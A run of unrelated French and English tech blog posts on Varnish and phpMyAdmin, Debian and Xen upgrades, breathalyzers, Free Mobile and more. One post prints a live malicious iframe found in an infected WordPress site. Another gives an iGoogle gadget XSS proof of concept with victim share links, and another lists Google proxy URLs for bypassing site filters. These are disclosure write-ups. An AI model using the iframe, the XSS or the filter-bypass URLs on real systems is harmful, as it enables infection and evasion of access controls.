Hope all of you know about Varnish, the http cache server. A very good and stable one.

But last week i had some issues regarding configuration of my phpmyadmin on it.

Phpmyadmin issue where :

Cannot start session without errors, please check errors given in your PHP and/or webserver log file and configure your PHP installation properly.

Eveywhere you’ll find this is an issue related to session temp directory configuration. FALSE. THIS IS BULLSHIT.

Here is the solution:

Firt of all you need to setup your varnish for the domain or the phpmyadmin directory not to be cached. I set this on a specific back office subdomain name for all my administration tasks (just restrict this access by ip AND passwd on htaccess btw).

Here is the related rules:

sub vcl_fetch {

        if (req.url ~ "XXXX.YYYYYY.TLD") {
                return(pass);
        }
}

Then you’ll have to configure your phpmyadmin directory. Software is not smart enough to understand it’s run behind  varnish, so he’ll try to redirect you to your backend server (which is, I HOPE, not available by public adress/port). So configure this directive « $cfg['PmaAbsoluteUri'] » swith your phpmyadmin public internet URL.
And then setup auth_type with « http ». Problem comes from « cookie » auth. I still didn’t resolv this issue but at least this configuration works !

$i = 0;
$i++;
/* Authentication type */
$cfg['Servers'][$i]['auth_type'] = 'http';
$cfg['Servers'][$i]['host'] = 'localhost';
$cfg['Servers'][$i]['connect_type'] = 'tcp';
$cfg['Servers'][$i]['compress'] = false;
/* Select mysql if your server does not have mysqli */
$cfg['Servers'][$i]['extension'] = 'mysqli';
$cfg['Servers'][$i]['AllowNoPassword'] = false;
$cfg['PmaAbsoluteUri'] = 'http://XXXXXXXXXXX/';

HF dudez.

With your multi-touch keyboard so you’ll know that holding down the shift or control key when you click on the tabs, they will then be grouped into a single selection with the obvious aim to assemble crowds for more tame.

Selection with control of my favorite sites:

Selection with shift:

Pin / to favorites / close:

Admit that it is horny.

Vous recherchez sans doute des éthylotest pas cher mais la vraie question, est-ce possible de trouver des éthylotest discount quand on sais que cela peut sauver des vie ?

Ethylotest pas cher

Que se passerait-il si vous faisiez pleinement confiance au résulta t de votre alcootest de faible qualité !

Les accidents avec alcool sont des accidents dans lesquels au moins un des conducteurs impliqués a un taux d’alcoolémie supérieur au taux maximum autorisé. Dans 85 % des cas d’accidents mortels liés à l’alcool, les responsables étaient des buveurs occasionnels. Il suffit souvent d’une fête de famille, d’un pot entre amis, d’un repas bien arrosé. L’alcool est à l’origine de 34% des accidents mortels toute l’année. Cette proportion s’élève à 45% dans les accidents mortels à un véhicule seul sans piéton. L’alcool est impliqué dans la moitié des accidents mortels survenus le week-end et il est la principale cause de 42% des accidents mortels touchant les jeunes de 18 à 24 ans l’été. Le risque d’accident mortel augmente considérablement avec le taux d’alcoolémie. Tout conducteur ou accompagnateur d’élève conducteur en état d’ébriété compromet gravement la sécurité de ses passagers et des autres usagers de la route. En conséquence, il est interdit de conduire avec un taux d’alcool égal ou supérieur à 0,5 gramme par litre de sang, soit 0,25 mg d’alcool par litre d’air expiré.

Sachez le !

Les forces de police et de gendarmerie pratiquent des dépistages du taux d’alcoolémie des automobilistes et des accompagnateurs d’élèves conducteurs :
En cas d’accident de la circulation ayant occasionné un dommage corporel, même si l’automobiliste n’en est pas responsable,
En cas d’infraction au code de la route (même en dehors d’un état d’ivresse manifeste).

Autres cas : Des dépistages peuvent être également ordonnés par le procureur de la République ou les officiers de police judiciaire, en dehors de toute infraction.

 SANCTIONS ENCOURUES

Si votre taux d’alcool est compris entre 0,5 et 0,8 gramme par litre de sang :
> Amende forfaitaire de 135 Euros et la perte de six points du permis de conduire.
En cas de comparution devant le tribunal (par décision du procureur de la République ou de contestation de l’amende forfaitaire), vous risquez également une suspension du permis de conduire.
Si votre taux d’alcool est supérieur à 0,8 gramme par litre de sang :
>   2 ans d’emprisonnement et 4 500 euros d’amende (ce délit donne lieu à la perte de six points du permis de conduire).
Enfin, si vous provoquez un accident en conduisant sous l’emprise de l’alcool, l’amende sera portée à 30 000 euros si vous occasionnez des blessures graves et vous serez passible d’un emprisonnement pouvant aller jusqu’à 10 ans et d’une amende pouvant atteindre 150 000 euros si vous provoquez la mort d’un autre usager de la route.

0,5 Gramme par litre d’alcool ; c’est deux verres :

Un petit rappel sur les effets de l’alcool dépendent du type d’alcoolisme.

Alcool aigu : l’alcool ingéré imprègne le système nerveux dans un temps relativement court.
Plusieurs phases peuvent être distinguées en fonction de la quantité ingérée (et de la personne).
Etat d’ébriété (0,3 et 1g/L de sang) : il y a une excitation psychomotrice
avec levée d’inhibition puis euphorie et enfin logorrhée (flot de paroles), troubles moteurs, réflexes ralentis.

Etat d’ivresse (1 et 3g/L de sang jusqu’à 5g/L selon les individus) : il est
caractérisé par des troubles de la conscience, de la parole, de l’équilibre, des gestes, des actes pouvant aller jusqu’à des violences graves + nausées, vomissements.
Un comportement furieux et des hallucinations peut être suivi d’un effet sédatif.

Etat comateux (4g/L de sang chez certaines personnes) : ralentissement
des rythmes cardiaques et respiratoires qui entraîne le comas éthylique et parfois la mort.

Alcoolisme chronique :Le foie et le cerveau sont les plus atteints.

L’appareil digestif :

• oesophagie, gastrite
• cancer des voies aéro-digestives (pharynx) qd association avec tabac
• pancréatite chronique
• stéatose (dégénérescence graisseuse des hépatocytes) qui peut être suivi par une cirrhose (destruction des hépatocytes) : stade ultime de la maladie qui peut entraîner la mort par coma hépatique ou hémorragie digestive.

Le système nerveux :
- la dépendance
- atteinte nerveuse périphérique (nerfs) : polynévrite des membres
inférieurs, névrite optique
- névropathies : névrose ou psychose.

Autres atteintes :

• divers cancers
• affections cardio-vasculaires : cardiomyopathies
• atteinte de la moelle osseuse (risques hémorragiques, anémie, baisse des défenses immunitaires)
• troubles gestationnels : l’alcool passe la barrière placentaire (trouble de l’embryogénèse) ? syndrome de l’alcoolisme foetal.

GNU/Linux Debian Lenny security support has been dropped since a few days (since the 6th of February to be exact). All administrators are encouraged to upgrade their system from Lenny (5.0) to Squeeze (6.0) as soon as possible.

In my previous article I explained how I migrated my dom0 to Squeeze, so now it’s time for me to explain how I did the same thing for domUs.

The domU migration from Lenny to Squeeze

As stated in my previous article, there is nothing specific to be done to migrate from Lenny to Squeeze. Just follow the instructions and everything should go just fine.

DO NOT REBOOT YOUR DOMU YET!

Two things may cause problems during upgrading:

• PyGrub, the script used by Xen to read the domU boot-loader’s configuration is not compatible with chain-loaded GRUB2. It will just fail finding any boot-loader in this configuration. Please read the following paragraph for the fix.
• The switch to the device UUID naming schema: it is not possible for the uuid command line tool to generate UUID for xvd (virtualized hard drives) devices. You’ll probably get an error screen stating that it was not possible to switch to the new naming schema. You can safely ignore this warning, as all configuration files will be left untouched.

Cleaning up for GRUB2

Hopefully you didn’t reboot your domUs yet: if you did, they simply won’t start. PyGrub won’t be able to read GRUB’s configuration and will thus refuse to boot anything.

You first need to migrate completely to GRUB2,  then delete GRUB 0.97 configuration files to force PyGrub to read the new ones:

$ sudo upgrade-from-grub-legacy

$ sudo rm /boot/grub/menu.lst*

With this done, you should be able to reboot your domUs without further issue.

Accessing LVM domU disks from the host

In case you didn’t know about the GRUB2 problem (like me) and attempted to reboot one of the domU, I’m gonna explain how to access the LVM-backup domU disks from the host.

You can just use mount because the LVM volume is hosting a disk image, not a partition. While some people are using mount only after computing the starting offset of the partition, I’d rather go with a cleaner, less dangerous solution.

First, you need to install the kpartx utility that we will use to create partition mappings on disk devices:

$ sudo apt-get install kpartx

Now what we’ll do is:

1. Create a mapping from the LVM volume to the device mapper. This will expose the partitions on the stored disk image.
2. Mount the device mapper /boot partition mapping to /mnt/
3. Remove the GRUB 0.97 files
4. Unmount everything.

$ sudo kpartx -av /dev/tank/disk-image

$ sudo mount /dev/mapper/disk-image1 /mnt

$ sudo rm /mnt/grub/menu.lst*

$ sudo umount /mnt

$ sudo kpartx -d /dev/mapper/disk-image1

Of course, you will need to adjust the paths for those commands depending on your specific setup.

Conclusion

Migrating a Lenny domU to Squeeze isn’t that straightforward because of this GRUB2 bug. I wonder how it went into the Debian’s stable repository. Probably a Xen upstream bug.

I didn’t notice any regression after upgrading to Xen 4.0. In fact, my domUs seems to be running a little faster, and they also seem more stable.

GNU/Linux Debian Lenny security support has been dropped since a few days (since the 6th of February to be exact). All administrators are encouraged to upgrade their system from Lenny (5.0) to Squeeze (6.0) as soon as possible.

I only had one server left running Lenny, so yesterday I decided to upgrade it. Everything went… well, I won’t say smooth but less than 24 hours later, everything is running again. Not so bad for a migration. :)

The migration from Lenny to Squeeze

In order to migrate to Squeeze we first need to grab the latest packages for Lenny. That’s obviously very easy:

$ sudo apt-get update

$ sudo apt-get upgrade

$ sudo apt-get dist-upgrade

With this done, we can go on and upgrade our /etc/apt/sources.list. You will need to replace every occurrence of the « lenny » keyword by « squeeze ». If you had the volatile repository enabled (look for « lenny/volatile »), you will need to remove it, as it no longer exists for Squeeze.

When you’re done replacing all occurrences, you may start updating the packages index and then the system itself:

$ sudo apt-get update

$ sudo apt-get upgrade

$ sudo apt-get dist-upgrade

Everything should go pretty straightforward. You should be asked the following questions:

• Do you want to move to dependency based boot? Yes, you most likely want that. If it fails, look for the names of the initscripts causing trouble, then « remove –purge » them.
• Do you want to switch from using device name to using device UUID instead? I’m not really fond of the UUID naming schema, but as it appears to be the new common usage, I accepted.
• Do you want to switch directly to GRUB2 or keep GRUB1 and do chain-loading? Well, for any standard setup GRUB2 should just work out-of-the-box. I’d advice not to chain load the boot-loaders in this case. If you’re using a specific file-system format on /boot, or if you have a complicated boot environment (multiple OSes, exotic hardware drivers, etc.) you may decide to enable chain-loading.

Cleaning up Xen 3.2 and setting up Xen 4.0

After this migration, we need to re-enable Xen, as the « generic » flavored kernel was installed by default. We also need to migrate the whole Xen toolstack from 3.2 to 4.0, as we’ll now be using a 2.6.32 kernel.

First, try to find every Xen related packages left on your system:

$ dpkg -l | grep xen

At this point, you should remove BUT NOT PURGE (you want to keep the configuration files) all the Xen related packages, except those that were migrated automatically to Xen 4.0.

Once you’re done with this, you may start re-installing Xen:

$ sudo apt-get install xen-hypervisor-4.0-i386 xen-linux-system-2.6-xen-686 xen-utils-4.0 xen-tools

My server is a 32 bits one so I went for the i386/686 version of Xen. If you have 64 bits capable hardware, you’d rather go with the x64 version (named amd64 in Debian).

The problem with the new GRUB2 is that the configuration generation scripts (in /etc/grub.d/) will always put the « generic » flavors of the kernel first in the boot-loader’s configuration. While this if fine for most users, we, in the other hand, need to boot the « xen » flavor. In order to achieve this, you will need to rename one of the GRUB2 generator:

$ cd /etc/grub.d/

$ sudo mv 10_linux 25_linux

$ update-grub2

You can now reboot and enjoy your migrated environment! :)

Conclusion

Everything is not perfect with this migration: one of the iptables feature used by Xen to tag network traffic on bridges/NAT mixed configuration has been deprecated in the latest kernel, resulting on the following dmesg polution:

physdev match: using --physdev-out in the OUTPUT, FORWARD and POSTROUTING chains for non-bridged traffic is not supported anymore.

While this is not looking very good, it seems that everything is still running fine. I’m not sure whether that’s a deprecation notice of if something is really missing.

Migrating the DomU from Lenny to Squeeze was not as easy, but that will be the subject for another article :)

First I was alerted by Google Webmaster Tools (GWT) that my websites were not in good health, just as it’s shown in this screenshot I found on Google images:

By looking what was wrong on my websites, I found this on the index.php of WordPress:

You can see the malicious iframe here:

<iframe src=http://almacostruzioni.eu/stata2.html WIDTH=1 HEIGHT=1 frameborder=0></IFRAME>

I did not try to debug what can be found at this URL, but this is surely some kind of script which profits of a Windows exploit and install the virus on your computer. So how do I know it has sniffed by FTP passwords? Because some of my websites were contamined also, especially those that were setup in my FTP client on the infected computer.

By finding this iframe on my website, Google flaged it as potentially dangerous for users. A warning message was appearing to anyone browsing with Google Chrome and connecting on my URLs.

What was really a lot less funny is that some Facebook pages were hosted on my server. Google flaged them also as being dangerous for users, that was really annoying for my clients. I had to reinstall a clean WordPress by night. Once this was done, I asked Google Webmaster Tools to reinspect my website and after around 24 hours, every warning messages were gone.

Hope it can helps someone in the same situation.

1. Write crafted gadget
2. Submit crafted gadget
3. Share it
4. Exploit it !

Then, we go …

1. Write crafted gadget

I’ve get the “Google News” gadget by downloading the following XML file:

http://www.gstatic.com/ig/modules/tabnews/kennedy/tabnews.xml

and added my <script> at the end like this :

…
ud=K.getString(x),vd=K.getMsg(x),wd=/\.cn$/.test(location.host);wd||!ud||ud==vd?pd():sd(ud); window.updateCustomEdit=kd;window.saveConfig=td;window.hideSettingsBlock=jd;})()</script>
<script>alert(/XSS by @MaKyOtOx/);</script>
<div id=settings_mask onclick="return false;"></div>
<div id=settings_block>
<div id=settings_content></div>
</div>
</Content></Module>

2. Submit crafted gadget

I’ve uploaded my xml here: http://www.makyoto.fr/xss/poc.xml

Then, once I’ve customized my gadget, I’ve submitted it here: http://www.google.com/ig/submit

No error was found in the crafted XML file, so it’s OK, my poc.xml is ready to be used as a gadget ^^

3. Share it

Easy to share with friends this gadget using the official sharing features. The following links can be sent to the victim:

http://www.google.com/ig/adde?moduleurl=www.makyoto.fr/xss/poc.xml%253C&source=imag

or

http://www.google.com/ig/directory?type=gadgets&url=www.makyoto.fr/xss/poc.xml

If you choose to add my gadget, a widget will be now present in the iGoogle dashboard.

4. Exploit it !

You are bad guys …

Google Security Team answered me “the domain in which the feature is hosted – gmodules.com – is specifically meant as a compartmentalized « sandbox » for various types of potentially unsafe, user-controlled content. This domain is isolated from any sensitive content due to the same-origin policy.”

Yes, they’re right because I cannot access to user auth cookies, but I can render and script what I want in the gadget … And, what if an attacker can access to popular gadgets XML files ?

Nevertheless I continue to believe that there is vulnerability because the XML file isn’t sufficiently sanitized before being processed.

Tweets are welcome @MaKyOtOx and @devquotes

• Utiliser la page de traduction de sites : http://www.google.com/translate?langpair=en|fr&u=www.site_interdit.xxx
• Utiliser la page pour obtenir la version mobile d’un site : http://www.google.com/gwt/n?u=http%3A%2F%2www.site_interdit.xxx
• Utiliser le cache Google : (bah tu cliques …)
• Utiliser Google Docs et notamment la fonction IMPORTDATA() : voir http://www.antoniorinaldi.it/use-google-spreadsheet-as-a-proxy/

Il existe au moins deux autres manières d’utiliser Google comme proxy, et ce en passant au travers des gadgets dédiés au portail iGoogle. Ces deux méthodes sont accessibles sans authentification préalable :

PoC#1 : http://www.ig.gmodules.com/gadgets/proxy/container=ig&gadget=http%3A%2F%2Fgoogle.com/http://www.site_interdit.xxx
(oui oui, la fin de la payload est étrange mais c’est normal)
PoC#2 : http://www.ig.gmodules.com/gadgets/makeRequest?httpMethod=GET&container=ig&url=http%3A%2F%2Fwww.site_interdit.xxx

Pour les 2 PoC, un fichier « p.txt » sera téléchargé. Il s’agit de la réponse votre requête.

L’équipe sécu de Google a été contactée ; elle considère qu’il s’agit d’une « by design feature ». Quelques limitations d’utilisation ont été mises en place comme la restriction aux protocoles HTTP(S) et un jeu de ports définis.

Comments are welcome !

http://web.archive.org/web/20011104050024/http://www.live.free.fr/

No image are available we would have like to see what kind of p0rn site it was (hard, soft, SM maybe :p)
If someone found the old images …

As some of you may know, today should be the official launch date for the Free Mobile GSM carrier in France. Why is it interesting?

Because Free.fr was always a synonym of evolution.

They were the first to sell 50 hours of dial up internet connectivity for 30€ a month when everybody else was selling 10 hours for 50€.

They were the first to sell unlimited 512k DSL internet access for 30€ when everybody else was selling it for at least twice more.

They were the first to promote ADSL2+, increasing the average customer bandwidth by a factor of at least 5.

They announced a new revolution for today: follow the announcement live with us!

Free Mobile launch

Today, Free, and specifically Xavier Niels, is supposed to launch its new mobile offer. French people have been waiting for the new carrier who should, as usual, create a real revolution in the GSM market.

What do we expect?

We’ll, mostly unlimited phone time for a very decent price, probably less than 40€.

Free managed to keep everything secret: the launch date, the details of the available subscriptions, and their price.

When?

We’re not quite sure yet. A PR campaign is running for a few days now, it includes many « mysterious » websites, where secrets are supposedly hidden. You can find a few of them here:

• http://mobile.free.fr/
• http://mobile.proxad.net/
• http://www.mamie-du-cantal.com/
• https://twitter.com/coucou_uf

Of course, except the 2 first links, we’re not sure that anything else is actually linked to Free in any way.

One of the Tweet from @coucou_uf states that the video stream should go live at 9h03m40s (probably AM) from Kourou, French Guiana. If we add the time offset, everything should start around 1.00pm French time.

The latest « move » from Free was seen on Twitter around 9.45am, from @coucou_uf:  »Il fait encore nuit sur la base, mais le ciel s’éclaircit, la lumière viendra à nous tous dans peu de temps. »

UPDATE: well… nothing was announced yet… but a tweet from @mamieducantal announced that we are currently halfway of the wait that started at new year’s eve for the official announcement. That means that we need to wait until the 12th of January!

Conclusion

We’ll try and keep you up to date.

Feel free to comment with more information if you know anything.